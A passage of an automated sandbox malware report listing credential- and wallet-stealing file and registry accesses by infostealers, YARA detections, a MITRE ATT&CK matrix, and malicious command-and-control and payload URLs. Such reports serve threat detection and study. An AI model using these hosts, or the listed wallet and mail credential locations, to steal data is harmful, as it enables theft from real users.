Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBckuYbXje.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 5108, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1924581251.0000000000E82000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 28.0.XBckuYbXje.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.GOLD.exe.34d5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.GOLD.exe.34d5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1885204503.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wxfM3haI2K.exe PID: 1456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBckuYbXje.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	21 Scheduled Task/Job	712 Process Injection	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	21 Scheduled Task/Job	241 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	Login Hook	Login Hook	1 Install Root Certificate	NTDS	447 System Information Discovery	Distributed Component Object Model	111 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	21 Scheduled Task/Job	Network Logon Script	Network Logon Script	23 Software Packing	LSA Secrets	1 Query Registry	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1391 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	571 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	571 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	712 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
PQ2AUndsdb.exe	66%	ReversingLabs	Win32.Packed.Themida
PQ2AUndsdb.exe	100%	Avira	TR/Crypt.TPM.Gen
PQ2AUndsdb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\BitcoinCore[1].exe	42%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	100%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe	92%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Set-up[1].exe	62%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	79%	ReversingLabs	Win32.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe	96%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe	96%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\runtime[1].exe	83%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	92%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	96%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	96%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	100%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	62%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	83%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	79%	ReversingLabs	Win32.Spyware.AsyncRAT
C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	42%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\40365\Beijing.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	66%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Roaming\XBckuYbXje.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Roaming\whicctb	96%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	92%	ReversingLabs	Win32.Spyware.Multiverze

Source	Detection	Scanner	Label
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	URL Reputation	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	0%	URL Reputation	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
analforeverlovyu.top	0%	URL Reputation	safe
http://185.215.113.16/inc/BitcoinCore.exe;	100%	Avira URL Cloud	phishing
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
95.179.163.21:29257	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/Set-up.exea	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	0%	URL Reputation	safe
https://api.ip.s	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/06/addressingex	0%	URL Reputation	safe
http://185.215.113.16/inc/BitcoinCore.exe?	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
fivexx5vs.top	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/BitcoinCore.exe2	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
https://wns.windows.com/	0%	Avira URL Cloud	safe
http://185.215.113.17/2fb6c2cc8dce150a.phpData	100%	Avira URL Cloud	malware
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	Avira URL Cloud	safe
http://yosoborno.com/mp/6HP	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://185.215.113.17/2fb6c2cc8dce150a.phpic_qt	100%	Avira URL Cloud	malware
http://185.215.113.16/inc/Set-up.exe=	100%	Avira URL Cloud	phishing
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/BitcoinCore.exe	100%	Avira URL Cloud	phishing
http://yosoborno.com/bH	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21ResponseD	0%	Avira URL Cloud	safe
http://yosoborno.com/tmp/	100%	Avira URL Cloud	malware
http://185.215.113.17/2fb6c2cc8dce150a.php6	100%	Avira URL Cloud	malware
http://185.215.113.17/2fb6c2cc8dce150a.php&	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
http://yosoborno.com/tmp/ds	100%	Avira URL Cloud	malware
http://185.215.113.16/inc/XClient_protected.exe	100%	Avira URL Cloud	phishing
http://185.215.113.17/2fb6c2cc8dce150a.php.dll	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
http://185.215.113.17/2fb6c2cc8dce150a.phpS	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://fivexx5vs.top/	0%	Avira URL Cloud	safe
http://185.215.113.17/2fb6c2cc8dce150a.phpV	100%	Avira URL Cloud	malware
http://tempuri.org/D	0%	Avira URL Cloud	safe
http://185.215.113.17/2fb6c2cc8dce150a.phpZ	100%	Avira URL Cloud	malware
http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.17/2fb6c2cc8dce150a.phpf	100%	Avira URL Cloud	malware
http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll9	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fivexx5vs.top	195.133.48.136	true	true	unknown
yosoborno.com	46.100.50.5	true	true	unknown
jirafasaltas.fun	188.114.97.3	true	false	unknown
oytrtojfgh.asia	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
95.179.163.21:29257	true	Avira URL Cloud: safe	unknown
fivexx5vs.top	true	Avira URL Cloud: safe	unknown
http://yosoborno.com/tmp/	true	Avira URL Cloud: malware	unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/BitcoinCore.exe?	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id23ResponseD	RegAsm.exe, 00000014.00000002.2071814033.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000020.00000002.2532893115.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/BitcoinCore.exe;	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/inc/Set-up.exea	axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://tempuri.org/	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 00000014.00000002.2071814033.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
